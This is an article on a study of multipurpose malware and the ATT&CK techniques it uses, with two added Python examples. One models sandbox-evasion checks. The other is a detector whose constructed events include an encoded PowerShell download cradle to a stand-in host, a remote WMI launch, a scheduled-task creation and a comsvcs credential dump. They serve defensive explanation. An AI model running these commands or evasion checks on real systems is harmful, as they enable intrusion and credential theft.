Multipurpose malware attacks are surging. Such malware has been called the “Swiss Army knife” of cybercriminals because a single sample can carry out several different attack techniques, both to evade detection and to maximize the impact of an attack.
A recent study that analyzed more than half a million unique malicious files collected in 2022 shows that cybercriminals have become more adept at developing sophisticated malware. The files were gathered from various threat intelligence sources, including open-source threat information providers, security researchers, and malware sandboxes. The samples show expanded capabilities that let them confuse and circumvent the way conventional security controls work.
Detection through threat intelligence alone is clearly no longer enough, and even behavior- and pattern-based analysis methods struggle with these newer threats. Defenders need better detection and prevention, and a reliable way to validate them, which is where cyber attack simulation comes in.
Evolving security solutions and threats
Attack simulation is one of the most useful tools against modern cyber threats. It exercises a range of adversary techniques against an existing security stack to measure how effective its controls actually are, and it provides insight into how to fix the defects or weaknesses the simulation uncovers. Security tooling is not the only thing evolving, however. Threat actors are ceaselessly looking for ways to defeat the advantages that simulation provides.
As such, attack simulations themselves need to improve. A simulation should validate security controls effectively, or provide actionable evidence when a control turns out to be ineffective. It should support threat exposure management and external attack surface management. It has to be capable of assessing, optimizing, and rationalizing security posture comprehensively and in line with the latest threat intelligence.
Threat actors are developing malware that does more than most security systems are designed to spot and block. “The fact that more malware can conduct lateral movement is a sign that adversaries of all types are being forced to adapt to differences in IT environments and work harder to get their payday,” notes Suleyman Ozarslan, one of the leads of the malware study mentioned earlier.
The complex threats posed by multipurpose malware
The study’s analysis reveals that around 10 percent of the malware examined matched more than 30 of the techniques described in the MITRE ATT&CK framework (the study refers to them as tactics, techniques, and procedures, or TTPs). Around a third of the samples matched 20 or more techniques, and the overall average was 11 techniques per sample.
The study also listed the ten TTPs most frequently associated with the files it evaluated. Leading the list is Command and Scripting Interpreter (ATT&CK T1059), observed in 31 percent of the samples. This execution technique runs arbitrary scripts, binaries, or commands through interpreters such as PowerShell, cmd.exe, or Unix shells to achieve various goals, including disabling security controls and downloading further payloads.
The second most common TTP is OS Credential Dumping (T1003), found in a quarter of the samples. Malware using it extracts credential material such as password hashes, plaintext passwords, or tickets from the operating system and applications, giving the attacker usernames, passwords, and other details that allow login to accounts and resources.
Third on the list, with a 23 percent incidence rate, is Data Encrypted for Impact (T1486). The ATT&CK technique covers any encryption of data that makes it unavailable, which includes ransomware, but the study highlights encryption carried out without financial motivation or any attempt to extort the victim, whose sole purpose is to encumber or disrupt the operations of the organization being attacked.
The next most common TTP is Process Injection (T1055), found in 22 percent of the samples: the injection of malicious code into legitimate processes. Rather than exploiting a vulnerability, the malware writes its code into the address space of a trusted process and executes it there, so the code runs with that process’s privileges and eludes controls that trust the host process.
With a 20 percent prevalence rate, the fifth item on the list is System Information Discovery (T1082): collecting data such as the operating system version, hardware, hostname, and installed patches of a device or the network it sits on. This reconnaissance feeds later stages, including lateral movement.
Next is the use of Remote Services (T1021), found in 18 percent of the scrutinized malware. It is largely aimed at the Windows Remote Desktop Protocol (RDP) but also targets similar services such as Secure Shell (SSH), Server Message Block (SMB), Virtual Network Computing (VNC), and Windows Remote Management (WinRM). Logging into these services with stolen credentials enables the takeover of a device and lateral movement across the network.
The seventh most common TTP in multipurpose malware, with a 15 percent prevalence, is the abuse of Windows Management Instrumentation (T1047). WMI is the core infrastructure for management data and operations in Windows. Once on a host, attackers use WMI to execute payloads and scripts locally or on remote systems, since WMI is a legitimate administrative channel that is rarely blocked.
Another common TTP is the use of the Scheduled Task/Job feature (T1053) that most operating systems provide. It was discovered in 12 percent of the samples. Malicious scheduled tasks often go unnoticed by security controls, especially when they are created under an account with administrative privileges. They can be used for remote code execution, for persistence of malicious processes across reboots, and for privilege escalation.
Virtualization/Sandbox Evasion (T1497) is another widely used TTP, found in 10 percent of the samples. Malware authors avoid detection by building in checks for sandboxes or virtualized analysis environments, typically looking at artifacts such as CPU count, memory size, uptime, hypervisor MAC prefixes, or running processes. If the checks indicate a sandbox, the malware “aborts mission” and behaves benignly.
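To make the decision logic concrete, here is an added example (not code from the page or from the study it cites) that models the kind of environment checks sandbox-aware malware performs and turns them around into a checklist for the analysis environment. The thresholds, the “abort when two or more checks fire” rule and the host profiles are constructed assumptions; the hypervisor OUI prefixes are publicly registered vendor assignments. Real samples inspect many more artifacts (registry keys, driver names, timing behaviour) with their own cutoffs.

```python
"""Model sandbox-evasion checks and what an analysis environment must present.

Added example, not code from the page or the study it cites. Thresholds,
the abort rule and the host profiles below are constructed assumptions."""
from dataclasses import dataclass

# OUIs (first three octets) registered to common hypervisor vendors.
HYPERVISOR_OUIS = {
    "00:05:69": "VMware", "00:0C:29": "VMware", "00:50:56": "VMware",
    "08:00:27": "VirtualBox", "00:15:5D": "Hyper-V", "52:54:00": "QEMU/KVM",
}


@dataclass
class HostProfile:
    cpu_count: int
    ram_gb: float
    disk_gb: float
    uptime_minutes: float
    mac: str
    process_count: int


def hypervisor_vendor(mac):
    """Vendor name if the MAC's OUI belongs to a known hypervisor, else None."""
    return HYPERVISOR_OUIS.get(mac.upper().replace("-", ":")[:8])


# (check name, predicate that a sample might use, what a sandbox should present instead)
CHECKS = [
    ("few_cpus", lambda h: h.cpu_count < 2, "expose at least 2 vCPUs"),
    ("low_ram", lambda h: h.ram_gb < 4, "allocate 4 GB RAM or more"),
    ("small_disk", lambda h: h.disk_gb < 60, "attach a disk of 60 GB or more"),
    ("fresh_boot", lambda h: h.uptime_minutes < 10, "let the VM run before detonation or fake uptime"),
    ("hypervisor_mac", lambda h: hypervisor_vendor(h.mac) is not None, "assign a non-hypervisor OUI"),
    ("few_processes", lambda h: h.process_count < 40, "run a realistic set of user applications"),
]

ABORT_THRESHOLD = 2  # assumption: the modelled sample aborts when 2+ checks fire


def evaluate(host):
    """Return (names of triggered checks, True if the modelled sample would abort)."""
    hits = [name for name, pred, _ in CHECKS if pred(host)]
    return hits, len(hits) >= ABORT_THRESHOLD


def sandbox_fixes(host):
    """Remediation hints for an analysis environment that trips the checks."""
    return [fix for name, pred, fix in CHECKS if pred(host)]


# Constructed profiles: a minimal default VM, a hardened VM, and a physical workstation.
DEFAULT_SANDBOX = HostProfile(1, 2.0, 40.0, 3.0, "00:0c:29:4a:1b:9e", 25)
HARDENED_SANDBOX = HostProfile(4, 8.0, 256.0, 600.0, "08:00:27:12:34:56", 90)
PHYSICAL_WORKSTATION = HostProfile(8, 16.0, 512.0, 4300.0, "3c:7c:3f:aa:bb:cc", 140)

if __name__ == "__main__":
    for label, host in (("default sandbox", DEFAULT_SANDBOX), ("hardened sandbox", HARDENED_SANDBOX)):
        hits, aborts = evaluate(host)
        print(f"{label}: triggered={hits} aborts={aborts}")
        for fix in sandbox_fixes(host):
            print("  fix:", fix)
```

The hardened profile still trips the MAC check, so a single remaining artifact is enough for a sample with a lower threshold; the practical lesson is that an analysis environment should pass every common check, and that the evasion check itself (querying CPU count, reading the adapter MAC, enumerating processes shortly after launch) is behaviour a detection rule can look for.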
The tenth most common technique is Remote System Discovery (T1018), associated with 8 percent of the malware examined. It has no direct impact on the affected system, but it enumerates other hosts and network segments, helping the attacker find additional targets, insecure remote hosts, and reachable networks.
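The technique counts quoted above come from mapping observed behaviour to ATT&CK technique IDs and counting distinct techniques per sample. The following added example (not code from the page or the study) shows a minimal version of that mapping over constructed process-creation command lines for the command-and-scripting-interpreter, scheduled-task, WMI, credential-dumping and discovery techniques in the list above; the sample IDs, events and matching rules are constructed assumptions, while the technique IDs are real ATT&CK entries. Encoded PowerShell is decoded so rules can see the inner payload, which is one of the ways the study’s top technique hides what it executes.

```python
"""Map process-creation command lines to ATT&CK technique IDs and count
distinct techniques per sample.

Added example, not code from the page or the study it cites. Events, sample
IDs and rules are constructed; production pipelines work from Sysmon Event
ID 1 or Windows 4688 telemetry and a far larger rule set."""
import base64
import re
from collections import defaultdict

# Real ATT&CK IDs paired with our own simplified heuristics (assumption: indicative only).
RULES = [
    (r"powershell(\.exe)?\s.*(-enc|-encodedcommand|iex|downloadstring)", "T1059.001"),  # PowerShell
    (r"\bcmd(\.exe)?\s+/c\b", "T1059.003"),                                            # Windows Command Shell
    (r"\bschtasks(\.exe)?\s+/create\b", "T1053.005"),                                    # Scheduled Task
    (r"\bwmic(\.exe)?\s.*\bprocess\s+call\s+create\b", "T1047"),                         # WMI
    (r"\b(net\s+view|nltest\s+/dclist|arp\s+-a)\b", "T1018"),                            # Remote System Discovery
    (r"(?:^|[\s&;|\"'])(?:systeminfo|hostname|ver)(?=$|[\s&;|\"'])", "T1082"),           # System Information Discovery
    (r"\b(procdump|mimikatz|sekurlsa|comsvcs\.dll,\s*minidump)\b", "T1003"),             # OS Credential Dumping
]

ENC_RE = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """Build the -EncodedCommand form PowerShell expects (UTF-16LE, base64).
    Used here only to construct the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_techniques(cmdline):
    """Technique IDs matched by one command line; a decoded PowerShell payload
    is appended so the rules also see the inner script."""
    decoded = decode_encoded_powershell(cmdline)
    text = cmdline + (" " + decoded if decoded else "")
    return {tid for pattern, tid in RULES if re.search(pattern, text, re.I)}


def techniques_per_sample(events):
    """Union of technique IDs across all events attributed to each sample."""
    per_sample = defaultdict(set)
    for sample_id, cmdline in events:
        per_sample[sample_id] |= match_techniques(cmdline)
    return dict(per_sample)


def technique_stats(per_sample):
    """(average, maximum) distinct technique count, the figures the study reports."""
    counts = [len(ids) for ids in per_sample.values()]
    return sum(counts) / len(counts), max(counts)


DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"

# Constructed events: (sample_id, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("sample-A", "powershell.exe -nop -w hidden -enc " + encode_powershell(DOWNLOAD_CRADLE)),
    ("sample-A", r'cmd.exe /c schtasks /create /tn Updater /tr "C:\Users\Public\u.exe" /sc minute /mo 5'),
    ("sample-A", 'wmic.exe /node:192.0.2.10 process call create "cmd /c whoami"'),
    ("sample-A", r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\l.dmp full"),
    ("sample-A", "cmd.exe /c net view /all & systeminfo"),
    ("sample-B", "cmd.exe /c ver"),
]

if __name__ == "__main__":
    result = techniques_per_sample(SAMPLE_EVENTS)
    for sample_id, ids in sorted(result.items()):
        print(f"{sample_id}: {len(ids)} techniques -> {sorted(ids)}")
    avg, top = technique_stats(result)
    print(f"average {avg:.1f}, max {top}")
```

Sample-A is what a multipurpose sample looks like in this model: seven distinct techniques from five events, spanning execution, persistence, lateral movement, credential access and discovery, whereas sample-B contributes only two. Counting distinct techniques per sample rather than per event is what keeps the average meaningful.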
These are just ten of the many tactics, techniques, and procedures that advanced malware can perform today. Sophisticated threat actors and cybercrime groups use them to minimize the chance of detection while making the most of the weaknesses they discover. Cybercriminals used to launch multiple separate attacks to find security weaknesses, confuse or disable security controls, and move laterally. Now these steps are packaged into a single piece of malware that pursues several goals at once and reduces the efficacy of modern security systems.
The need for better attack simulation
The researchers behind the study suggest that well-resourced, high-profile threat actors are responsible for the rise of multipurpose malware, as they work to defeat modern behavior-based threat detection.
The logical response for security teams is to improve their defenses using up-to-date threat intelligence and established security frameworks, so that threats are detected before an attack compromises systems. Security controls must be updated regularly, and remediation priorities need to track the most recent threat research and trends.
Such improvements can only be properly evaluated through enhanced cyber attack simulation. Organizations should therefore make sure that the simulation platform or method they use is reliable: continuously updated with the most recent information on attack techniques, backed by established security frameworks such as MITRE ATT&CK, and customizable and scalable enough to match the specific needs of the organization.